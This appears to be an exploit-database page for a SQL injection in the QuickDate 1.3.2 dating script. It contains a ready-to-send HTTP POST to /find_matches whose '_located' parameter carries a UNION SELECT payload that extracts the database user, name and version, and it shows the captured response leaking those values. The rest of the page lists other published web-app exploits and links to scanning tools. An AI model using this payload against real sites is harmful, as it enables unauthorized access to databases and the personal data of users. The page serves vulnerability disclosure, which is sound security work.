Search for hundreds of thousands of exploits

"QuickDate 1.3.2 - SQL Injection"

Author

Exploit author

"Ihsan Sencan"

Platform

Exploit platform

php

Release date

Exploit published date

2020-02-07

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
# Exploit Title: QuickDate 1.3.2 - SQL Injection
# Dork: N/A
# Date: 2020-02-07
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://quickdatescript.com/
# Version: 1.3.2
# Tested on: Linux
# CVE: N/A

# POC: 
# 1)
# 
POST /find_matches HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 425
Cookie: quickdating=a50b670982b01b4f0608a60217309d11; mode=night; JWT=a0823ac00ff28243d0c8caa841ebacd55bbf6d40f571d45bfb0f504e8b0b13be16222ee080568613ca7be8306ecc3f5fa30ff2c41e64fa7b
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

_located=-7 UNION ALL SELECT%2BCONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113-- -
# 
# 
HTTP/1.1 200 OK
Date: Thu, 06 Feb 2020 15:05:34 GMT
Server: Apache
Connection: Keep-alive, close
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
Access-Control-Allow-Headers: Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: application/json; charset=UTF-8
Content-Length: 3844

{"status":200,"page":1,"post":"{\"_located\":\"-7 UNION AL...... class=\"btn waves-effect dislike _dislike_textdate_main@localhost : date_main : 10.2.31-MariaDB\".......","where":"","message":"OK","can_send":1}
#
Release DateTitleTypePlatformAuthor
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
Release DateTitleTypePlatformAuthor
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
Release DateTitleTypePlatformAuthor
2020-02-07"QuickDate 1.3.2 - SQL Injection"webappsphp"Ihsan Sencan"
2020-02-06"Online Job Portal 1.0 - Cross Site Request Forgery (Add User)"webappsphp"Ihsan Sencan"
2020-02-06"Online Job Portal 1.0 - 'user_email' SQL Injection"webappsphp"Ihsan Sencan"
2020-02-06"Online Job Portal 1.0 - Remote Code Execution"webappsphp"Ihsan Sencan"
2020-02-05"AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)"webappsjson"Ihsan Sencan"
2020-02-05"AVideo Platform 8.1 - Information Disclosure (User Enumeration)"webappsjson"Ihsan Sencan"
2019-01-28"Teameyo Project Management System 1.0 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-28"Mess Management System 1.0 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-25"GreenCMS 2.x - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-25"GreenCMS 2.x - Arbitrary File Download"webappsphp"Ihsan Sencan"
2019-01-24"Joomla! Component J-CruisePortal 6.0.4 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-24"SimplePress CMS 1.0.7 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-24"Joomla! Component JHotelReservation 6.0.7 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vBizz 1.0.7 - Remote Code Execution"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component JMultipleHotelReservation 6.0.7 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component J-ClassifiedsManager 3.0.5 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vRestaurant 1.9.4 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vAccount 2.0.2 - 'vid' SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component VMap 1.9.6 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vBizz 1.0.7 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vReview 1.9.11 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vWishlist 1.0.1 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component J-BusinessDirectory 4.9.7 - 'type' SQL Injection"webappsphp"Ihsan Sencan"
2019-01-22"Joomla! Component Easy Shop 1.2.3 - Local File Inclusion"webappsphp"Ihsan Sencan"
2019-01-21"Coman 1.0 - 'id' SQL Injection"webappsphp"Ihsan Sencan"
2019-01-21"MoneyFlux 1.0 - 'id' SQL Injection"webappsphp"Ihsan Sencan"
2019-01-21"PHP Dashboards NEW 5.8 - Local File Inclusion"webappsphp"Ihsan Sencan"
2019-01-21"PHP Dashboards NEW 5.8 - 'dashID' SQL Injection"webappsphp"Ihsan Sencan"
2019-01-21"Reservic 1.0 - 'id' SQL Injection"webappsphp"Ihsan Sencan"
2019-01-21"PHP Uber-style GeoTracking 1.1 - SQL Injection"webappsphp"Ihsan Sencan"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48022/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.